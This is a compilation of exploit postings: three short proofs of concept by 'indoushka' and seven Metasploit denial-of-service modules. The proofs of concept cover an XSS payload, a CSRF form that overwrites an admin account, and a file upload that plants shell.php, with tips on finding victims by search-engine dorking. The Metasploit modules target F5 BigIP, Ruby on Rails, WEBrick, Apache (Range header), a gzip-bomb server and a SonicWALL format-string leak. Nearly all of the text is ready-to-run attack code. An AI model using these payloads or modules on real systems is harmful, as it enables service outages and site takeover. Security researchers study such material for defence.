<pre><code>=============================================================================================================================================<br />| # Title : penglead v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /login.php/"onmouseover%3d'prompt(920974)'bad%3d"<br /><br />[+] https://www/127.0.0.1/demo/brokerbaba.buzz/login.php/"onmouseover%3d'prompt(920974)'bad%3d"<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : ppdb v2.4-update 6118-1 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to the line 10. Set the target website link Save changes and apply . <br /><br />[+] infected file : /root/psb-user-update.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><div class="col-lg-6"><br /> <h2 class="page-header">Administrator</h2><br /> <div class="panel panel-default"><br /> <div class="panel-heading"><br /> User Profile <br /> </div><br /> <!-- /.panel-heading --><br /> <div class="panel-body"><br /> <div class="table-responsive"><br /> <form role="form" method="post" action="http://127.0.0.1/ppdb/root/psb-user-update.php" enctype="multipart/form-data"><br /> <table class="table table-striped table-bordered table-hover"><br /> <br /> <tbody><br /> <br /><br /> <tr> <br /> <td>Username</td><br /> <td><input class="form-control" type="text" name="username" value="indoushka" required=""><br /> <input class="form-control" type="hidden" name="id" value="1"></td><br /> </tr><br /><br /> <tr><br /> <td>Password</td><br /> <td><input class="form-control" type="password" name="password" id="password" required=""></td><br /> </tr><br /> <tr><br /> <td>Nama</td><br /> <td><input class="form-control" type="nama" name="nama" id="nama" value="nekkaa salah eddine" required=""></td><br /> </tr><br /><br /> <tr><br /> <td>Email</td><br /> <td><input class="form-control" type="text" name="email" value="indoushka4ever@gmail.com" required=""><br /> <input type="hidden" name="level" id="level" value="1"><br /> </td><br /> </tr><br /> <tr><br /><td colspan="3"><input type="file" name="foto" id="foto" required=""></td><br /></tr><br /> <br /> </tbody><br /> </table><br /> <button type="submit" class="btn btn-primary" name="update" id="update">Update</button><br /> </form><br /> </div><br /> <!-- /.table-responsive --><br /> </div><br /> <!-- /.panel-body --><br /> </div><br /> <!-- /.panel --><br /> </div><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Travel Agency System v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/online-travel-agency-system-using-php.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 8.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php.<br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html><br /><head><br /> <title>Employee Form</title><br /></head><br /><body><br /> <h2>Employee Form</h2><br /> <form action="http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php" method="post" enctype="multipart/form-data"><br /> <label for="userfile">Profile Picture:</label><br /> <input type="file" id="userfile" name="userfile" required><br><br><br /><br /> <input type="submit" name="employeeform" value="Submit"><br /> </form><br /></body><br /></html><br /><br /><br />[+] http://127.0.0.1/php-travel-agency-system-master/admin/user/shell.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'F5 BigIP Access Policy Manager Session Exhaustion Denial of Service',<br /> 'Description' => %q{<br /> This module exploits a resource exhaustion denial of service in F5 BigIP devices. An<br /> unauthenticated attacker can establish multiple connections with BigIP Access Policy<br /> Manager (APM) and exhaust all available sessions defined in customer license. In the<br /> first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP<br /> system creates a session, marks it as pending and then redirects the client to an access<br /> policy URI. Since BigIP allocates a new session after the first unauthenticated request,<br /> and deletes the session only if an access policy timeout expires, the attacker can exhaust<br /> all available sessions by repeatedly sending the initial HTTP request and leaving the<br /> sessions as pending.<br /> },<br /> 'Author' =><br /> [<br /> 'Denis Kolegov <dnkolegov[at]gmail.com>',<br /> 'Oleg Broslavsky <ovbroslavsky[at]gmail.com>',<br /> 'Nikita Oleksov <neoleksov[at]gmail.com>'<br /> ],<br /> 'References' =><br /> [<br /> ['URL', 'https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' =><br /> {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> }<br /> ))<br /><br /> register_options(<br /> [<br /> OptInt.new('RLIMIT', [true, 'The number of requests to send', 10000]),<br /> OptBool.new('FORCE', [true, 'Proceed with attack even if a BigIP virtual server isn\'t detected', false])<br /> ])<br /> end<br /><br /> def run<br /> limit = datastore['RLIMIT']<br /> force_attack = datastore['FORCE']<br /><br /> res = send_request_cgi('method' => 'GET', 'uri' => '/')<br /><br /> unless res<br /> print_error("No answer from the BigIP server")<br /> return<br /> end<br /><br /> # Simple test based on HTTP Server header to detect BigIP virtual server<br /> server = res.headers['Server']<br /> unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack<br /> print_error("BigIP virtual server was not detected. Please check options")<br /> return<br /> end<br /><br /> print_status("Starting DoS attack")<br /><br /> # Start attack<br /> limit.times do |step|<br /> if step % 100 == 0<br /> print_status("#{step * 100 / limit}% accomplished...")<br /> end<br /> res = send_request_cgi('method' => 'GET', 'uri' => '/')<br /> if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/<br /> print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.")<br /> return<br /> end<br /> end<br /><br /> # Check if attack has failed<br /> res = send_request_cgi('method' => 'GET', 'uri' => uri)<br /> if res.headers['Location'] =~ /\/my.policy/<br /> print_error("DoS attack failed. Try to increase the RLIMIT")<br /> else<br /> print_status("Result is undefined. Try to manually determine DoS attack result")<br /> end<br /><br /> rescue ::Errno::ECONNRESET<br /> print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")<br /> rescue ::Rex::ConnectionRefused<br /> print_error("Unable to connect to BigIP")<br /> rescue ::Rex::ConnectionTimeout<br /> print_error("Unable to connect to BigIP. Please check options")<br /> rescue ::OpenSSL::SSL::SSLError<br /> print_error("SSL/TLS connection error")<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS',<br /> 'Description' => %q{<br /> When Ruby attempts to convert a string representation of a large floating point<br /> decimal number to its floating point equivalent, a heap-based buffer overflow<br /> can be triggered. This module has been tested successfully on a Ruby on Rails application<br /> using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application<br /> crashes with a segfault error. Other versions of Ruby are reported to be affected.<br /> },<br /> 'Author' =><br /> [<br /> 'Charlie Somerville', # original discoverer<br /> 'joev', # bash PoC<br /> 'todb', # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'CVE', '2013-4164' ],<br /> [ 'OSVDB', '100113' ],<br /> [ 'URL', 'https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/' ]<br /> ],<br /> 'DisclosureDate' => '2013-11-22'))<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),<br /> OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])<br /> ])<br /> end<br /><br /> def uri<br /> normalize_uri(target_uri.path.to_s)<br /> end<br /><br /> def verb<br /> datastore['HTTPVERB'] || 'POST'<br /> end<br /><br /> def digit_pattern<br /> @digit_pattern ||= rand(10_000).to_s<br /> end<br /><br /> def integer_part<br /> digit_pattern<br /> end<br /><br /> def multiplier<br /> (500_000 * (1.0/digit_pattern.size)).to_i<br /> end<br /><br /> def fractional_part<br /> digit_pattern * multiplier<br /> end<br /><br /> # The evil_float seems to require some repeating element. Maybe<br /> # it's just superstition, but straight up 300_002-lenth random<br /> # numbers don't appear to trigger the vulnerability. Also, these are<br /> # easier to produce, and slightly better than the static "1.1111..."<br /> # for 300,000 decimal places.<br /> def evil_float_string<br /> [integer_part,fractional_part].join('.')<br /> end<br /><br /> def run<br /> print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places"<br /> sploit = '['<br /> sploit << evil_float_string<br /> sploit << ']'<br /> print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}"<br /> target_available = true<br /><br /> begin<br /> res = send_request_cgi(<br /> {<br /> 'method' => verb,<br /> 'uri' => uri,<br /> 'ctype' => "application/json",<br /> 'data' => sploit<br /> })<br /> rescue ::Rex::ConnectionRefused<br /> print_error "Unable to connect. (Connection refused)"<br /> target_available = false<br /> rescue ::Rex::HostUnreachable<br /> print_error "Unable to connect. (Host unreachable)"<br /> target_available = false<br /> rescue ::Rex::ConnectionTimeout<br /> print_error "Unable to connect. (Timeout)"<br /> target_available = false<br /> end<br /><br /> return unless target_available<br /><br /> print_status "Checking availability"<br /> begin<br /> res = send_request_cgi({<br /> 'method' => verb,<br /> 'uri' => uri,<br /> 'ctype' => "application/json",<br /> 'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json<br /> })<br /> if res and res.body and res.body.size > 0<br /> target_available = true<br /> else<br /> print_good "#{peer}#{uri} - DoS appears successful (No useful response from host)"<br /> target_available = false<br /> end<br /> rescue ::Rex::ConnectionError, Errno::ECONNRESET<br /> print_good "DoS appears successful (Host unreachable)"<br /> target_available = false<br /> end<br /><br /> return unless target_available<br /><br /> print_error "Target is still responsive, DoS was unsuccessful."<br /><br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',<br /> 'Description' => %q{<br /> The WEBrick::HTTP::DefaultFileHandler in WEBrick in<br /> Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7<br /> to 1.8.7-p71, and 1.9 to r18423 allows for a DoS<br /> (CPU consumption) via a crafted HTTP request.<br /> },<br /> 'Author' => 'kris katterjohn',<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'BID', '30644'],<br /> [ 'CVE', '2008-3656'],<br /> [ 'OSVDB', '47471' ],<br /> [ 'URL', 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']<br /> ],<br /> 'DisclosureDate' => '2008-08-08'))<br /><br /> register_options([<br /> OptString.new('URI', [ true, 'URI to request', '/' ])<br /> ])<br /> end<br /><br /> def run<br /> begin<br /> o = {<br /> 'uri' => normalize_uri(datastore['URI']),<br /> 'headers' => {<br /> 'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100<br /> }<br /> }<br /><br /> c = connect(o)<br /> c.send_request(c.request_raw(o))<br /><br /> print_status("Request sent to #{rhost}:#{rport}")<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_status("Couldn't connect to #{rhost}:#{rport}")<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Scanner<br /> include Msf::Auxiliary::Report<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Apache Range Header DoS (Apache Killer)',<br /> 'Description' => %q{<br /> The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x<br /> through 2.2.19 allows remote attackers to cause a denial of service (memory and<br /> CPU consumption) via a Range header that expresses multiple overlapping ranges,<br /> exploit called "Apache Killer"<br /> },<br /> 'Author' =><br /> [<br /> 'Kingcope', #original discoverer<br /> 'Masashi Fujiwara', #metasploit module<br /> 'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Actions' =><br /> [<br /> ['DOS', 'Description' => 'Trigger Denial of Service against target'],<br /> ['CHECK', 'Description' => 'Check if target is vulnerable']<br /> ],<br /> 'DefaultAction' => 'DOS',<br /> 'References' =><br /> [<br /> [ 'BID', '49303'],<br /> [ 'CVE', '2011-3192'],<br /> [ 'EDB', '17696'],<br /> [ 'OSVDB', '74721' ],<br /> ],<br /> 'DisclosureDate' => '2011-08-19'<br /> ))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('URI', [ true, "The request URI", '/']),<br /> OptInt.new('RLIMIT', [ true, "Number of requests to send",50])<br /> ])<br /> end<br /><br /> def run_host(ip)<br /><br /> case action.name<br /> when 'DOS'<br /> conduct_dos()<br /><br /> when 'CHECK'<br /> check_for_dos()<br /> end<br /><br /> end<br /><br /> def check_for_dos()<br /> uri = datastore['URI']<br /> rhost = datastore['RHOST']<br /> begin<br /> res = send_request_cgi({<br /> 'uri' => uri,<br /> 'method' => 'HEAD',<br /> 'headers' => {<br /> "HOST" => rhost,<br /> "Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10",<br /> "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"<br /> }<br /> })<br /><br /> if (res and res.code == 206)<br /> print_status("Response was #{res.code}")<br /> print_status("Found Byte-Range Header DOS at #{uri}")<br /><br /> report_note(<br /> :host => rhost,<br /> :port => rport,<br /> :type => 'apache.killer',<br /> :data => "Apache Byte-Range DOS at #{uri}"<br /> )<br /><br /> else<br /> print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")<br /> end<br /><br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br /><br /><br /> def conduct_dos()<br /> uri = datastore['URI']<br /> rhost = datastore['RHOST']<br /> ranges = ''<br /> for i in (0..1299) do<br /> ranges += ",5-" + i.to_s<br /> end<br /> for x in 1..datastore['RLIMIT']<br /> begin<br /> print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")<br /> res = send_request_cgi({<br /> 'uri' => uri,<br /> 'method' => 'HEAD',<br /> 'headers' => {<br /> "HOST" => rhost,<br /> "Range" => "bytes=0-#{ranges}",<br /> "Request-Range" => "bytes=0-#{ranges}"}},1)<br /><br /> rescue ::Rex::ConnectionRefused<br /> print_error("Unable to connect to #{rhost}:#{rport}")<br /> rescue ::Errno::ECONNRESET<br /> print_good("DoS packet successful. #{rhost} not responding.")<br /> rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_error("Couldn't connect to #{rhost}:#{rport}")<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Ruby on Rails Action View MIME Memory Exhaustion',<br /> 'Description' => %q{<br /> This module exploits a Denial of Service (DoS) condition in Action View that requires<br /> a controller action. By sending a specially crafted content-type header to a Rails<br /> application, it is possible for it to store the invalid MIME type, and may eventually<br /> consume all memory if enough invalid MIMEs are given.<br /><br /> Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.<br /> },<br /> 'Author' =><br /> [<br /> 'Toby Hsieh', # Reported the issue<br /> 'joev', # Metasploit<br /> 'sinn3r' # Metasploit<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'CVE', '2013-6414' ],<br /> [ 'OSVDB', '100525' ],<br /> [ 'BID', '64074' ],<br /> [ 'URL', 'https://seclists.org/oss-sec/2013/q4/400' ],<br /> [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]<br /> ],<br /> 'DisclosureDate' => '2013-12-04'))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('URIPATH', [true, 'The URI that routes to a Rails controller action', '/']),<br /> OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),<br /> OptInt.new('REQCOUNT', [true, 'Number of HTTP requests to pipeline per connection', 1]),<br /> OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])<br /> ],<br /> self.class)<br /> end<br /><br /> def host<br /> host = datastore['RHOST']<br /> host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80<br /> host<br /> end<br /><br /> def long_string<br /> Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])<br /> end<br /><br /> #<br /> # Returns a modified version of the URI that:<br /> # 1. Always has a starting slash<br /> # 2. Removes all the double slashes<br /> #<br /> def normalize_uri(*strs)<br /> new_str = strs * "/"<br /><br /> new_str = new_str.gsub!("//", "/") while new_str.index("//")<br /><br /> # Makes sure there's a starting slash<br /> unless new_str.start_with?("/")<br /> new_str = '/' + new_str<br /> end<br /><br /> new_str<br /> end<br /><br /> def http_request<br /> uri = normalize_uri(datastore['URIPATH'])<br /><br /> http = ''<br /> http << "GET #{uri} HTTP/1.1\r\n"<br /> http << "Host: #{host}\r\n"<br /> http << "Accept: #{long_string}\r\n"<br /> http << "\r\n"<br /><br /> http<br /> end<br /><br /> def run<br /> begin<br /> print_status("Stressing the target memory, this will take quite some time...")<br /> datastore['RLIMIT'].times { |i|<br /> connect<br /> datastore['REQCOUNT'].times { sock.put(http_request) }<br /> disconnect<br /> }<br /><br /> print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_status("Unable to connect to #{host}.")<br /> rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error<br /> print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")<br /> ensure<br /> disconnect<br /> end<br /> end<br />end<br /><br />=begin<br /><br />Reproduce:<br /><br />1. Add a def index; end to ApplicationController<br />2. Add an empty index.html.erb file to app/views/application/index.html.erb<br />3. Uncomment the last line in routes.rb<br />4. Hit /application<br /><br />=end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'zlib'<br />require 'stringio'<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Gzip Memory Bomb Denial Of Service',<br /> 'Description' => %q{<br /> This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.<br /> Many applications will not implement a length limit check and will eat up all memory and<br /> eventually die. This can also be used to kill systems that download/parse content from<br /> a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).<br /><br /> A FILEPATH datastore option can also be provided to save the .gz bomb locally.<br /><br /> Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly<br /> deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)<br /> will generate a 300 byte gzipped file that expands to 10GB.<br /> },<br /> 'Author' =><br /> [<br /> 'info[at]aerasec.de', # 2004 gzip bomb advisory<br /> 'joev' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'URL', 'http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html' ]<br /> ],<br /> 'DisclosureDate' => '2004-01-01',<br /> 'Actions' =><br /> [<br /> [ 'WebServer', 'Description' => 'Host file via web server' ]<br /> ],<br /> 'PassiveActions' =><br /> [<br /> 'WebServer'<br /> ],<br /> 'DefaultAction' => 'WebServer'))<br /><br /> register_options(<br /> [<br /> OptInt.new('SIZE', [true, 'Size of uncompressed data in megabytes (10GB default).', 10240]),<br /> OptInt.new('ROUNDS', [true, 'Rounds of gzip compression. Some applications (FF) support > 1.', 1]),<br /> OptString.new('URIPATH', [false, 'Path of URI on server to the gzip bomb (default is random)']),<br /> OptString.new('CONTENT_TYPE', [false, 'Content-Type header to serve in the response', 'text/html'])<br /> ],<br /> self.class)<br /> end<br /><br /> def run<br /> datastore['HTTP::compression'] = false # not a good idea<br /> @gzip = generate_gzip<br /> print_status "Gzip generated. Uncompressed=#{default_size}bytes. Compressed=#{@gzip.length}bytes."<br /> exploit # start http server<br /> end<br /><br /> def on_request_uri(cli, request)<br /> print_status "Sending gzipped payload to client #{cli.peerhost}"<br /> rounds = (['gzip']*datastore['ROUNDS']).join(', ')<br /> send_response(cli, @gzip, { 'Content-Encoding' => rounds, 'Content-Type' => datastore['CONTENT_TYPE'] })<br /> end<br /><br /> # zlib ftw<br /> def generate_gzip(size=default_size, blocks=nil, reps=nil)<br /> reps ||= datastore['ROUNDS']<br /> return blocks if reps < 1<br /><br /> print_status "Generating gzip bomb..."<br /> StringIO.open do |io|<br /> stream = Zlib::GzipWriter.new(io, Zlib::BEST_COMPRESSION, Zlib::DEFAULT_STRATEGY)<br /> buf = nil<br /> begin<br /> # add MB of data to the stream. this takes a little while, but doesn't kill memory.<br /> if blocks.nil?<br /> chunklen = 1024*1024*8 # 8mb per chunk<br /> a = "A"*chunklen<br /> n = size / chunklen<br /><br /> n.times do |i|<br /> stream << a<br /> if i % 100 == 0<br /> print_status "#{i.to_s.rjust(Math.log(n,10).ceil)}/#{n} chunks added (#{'%.1f' % (i.to_f/n.to_f*100)}%)"<br /> end<br /> end<br /> else<br /> stream << blocks<br /> end<br /><br /> a = nil # gc a<br /> buf = generate_gzip(size, io.string, reps-1)<br /> ensure<br /> stream.flush<br /> stream.close<br /> end<br /> buf<br /> end<br /> end<br /><br /> def default_size<br /> datastore['SIZE']*1024*1024 # mb -> bytes<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok.<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'SonicWALL SSL-VPN Format String Vulnerability',<br /> 'Description' => %q{<br /> There is a format string vulnerability within the SonicWALL<br /> SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory<br /> can be read or written to, depending on the format string used.<br /> There appears to be a length limit of 127 characters of format<br /> string data. With physical access to the device and debugging,<br /> this module may be able to be used to execute arbitrary code remotely.<br /> },<br /> 'Author' => [ 'aushack' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'BID', '35145' ],<br /> #[ 'CVE', '' ], # no CVE?<br /> [ 'OSVDB', '54881' ],<br /> [ 'URL', 'http://www.aushack.com/200905-sonicwall.txt' ],<br /> ],<br /> 'DisclosureDate' => '2009-05-29'))<br /><br /> register_options([<br /> OptString.new('URI', [ true, 'URI to request', '/cgi-bin/welcome/VirtualOffice?err=' ]),<br /> OptString.new('FORMAT', [ true, 'Format string (i.e. %x, %s, %n, %p etc)', '%x%x%x%x%x%x%x' ]),<br /> Opt::RPORT(443),<br /> OptBool.new('SSL', [true, 'Use SSL', true]),<br /> ])<br /> end<br /><br /> def run<br /> if (datastore['FORMAT'].length > 125) # Max length is 127 bytes<br /> print_error("FORMAT string length cannot exceed 125 bytes.")<br /> return<br /> end<br /><br /> fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp<br /> begin<br /> res = send_request_raw({<br /> 'uri' => normalize_uri(datastore['URI']) + fmt,<br /> })<br /><br /> if res and res.code == 200<br /> res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)<br /> print_status("Information leaked: #{$1}")<br /> end<br /><br /> print_status("Request sent to #{rhost}:#{rport}")<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_status("Couldn't connect to #{rhost}:#{rport}")<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br />end<br /></code></pre>